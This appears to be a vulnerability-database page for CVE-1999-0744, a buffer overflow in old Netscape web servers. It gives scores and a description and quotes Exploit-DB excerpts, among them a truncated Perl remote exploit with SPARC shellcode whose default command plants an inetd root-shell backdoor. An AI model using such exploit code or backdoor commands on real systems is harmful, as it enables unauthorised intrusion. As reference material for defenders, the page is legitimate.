CVE-1999-0744
published 2000-01-04CVE-1999-0744: Buffer overflow in Netscape Enterprise Server and FastTrask Server allows remote attackers to gain privileges via a long HTTP GET request.
PriorityP334high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.50%
82.7th percentile
Buffer overflow in Netscape Enterprise Server and FastTrask Server allows remote attackers to gain privileges via a long HTTP GET request.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Command Execution
exploitdb·2001-01-27
CVE-1999-0744 Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Command Execution
Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Command Execution
---
#!/usr/bin/perl
#
# Remote sploit for Netscape Enterprise Server 4.0/sparc/SunOS 5.7
# usage: ns-shtml.pl ['command line'] | nc victim port
#
# Sometimes server may hang or coredump.. eek ;-)
# [email protected]
$cmdline="echo 'ingreslock stream tcp nowait root /bin/sh sh -i' > /tmp/bob; /usr/sbin/inetd -s /tmp/bob";
$cmdline=$ARGV[0] if $ARGV[0];
$nop='%80%1b%c0%1f';
$strlen=0x54 + length($cmdline);
$cmdline=~ s/ /%20/g; # encode bad characters..
$strlen=sprintf "%%%x", $strlen;
$shell=
'%20%bf%ff%ff' .# start: bn,a ! super-dooper trick to get current address ;')
'%20%bf%ff%ff' .# boom: bn,a
'%7f%ff%ff%ff' .# call boom
'%90%03%e0%48' .# add %o7, binksh - boom, %o0 ! put binksh address into %o0
'%92%03
Exploit-DB
Netscape FastTrack Server 2.0.1a - GET Buffer Overflow
exploitdb·1999-12-31
CVE-1999-0744 Netscape FastTrack Server 2.0.1a - GET Buffer Overflow
Netscape FastTrack Server 2.0.1a - GET Buffer Overflow
---
// source: https://www.securityfocus.com/bid/908/info
The version of Netscape FastTrack server that ships with UnixWare 7.1 is vulnerable to a remote buffer overlow. By default, the httpd listens on port 457 of the UnixWare host and serves documentation via http. If you pass the server a GET request with more than 367 characters, the stack overflows and the EIP is overwritten making it possible to execute arbitrary code with the privileges of the httpd (usually nobody).
/** uwhelp.c - remote exploit for UnixWare's Netscape FastTrack =
** 2.01a scohelp http service
**
** Runs the command of your choice with uid of the http daemon
** (probably nobody). If there are spaces in your command, use
** ${IFS} instead of a space. httpd
Exploit-DB
Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET
exploitdb·1999-08-25
CVE-1999-0744 Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET
Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET
---
source: https://www.securityfocus.com/bid/1024/info
A GET request containing over 4080 characters will cause the httpd.exe process to crash within Netscape Enterprise Server 3.6, resulting in a Dr. Watson error. Arbitrary code can be executed remotely at this point.
Netscape Enterprise Server 3.5 running on either Netware or Solaris is not known to be susceptible to this issue.
GET /(4080 character string) HTTP/1.0
No writeups or analysis indexed.
2000-01-04
Published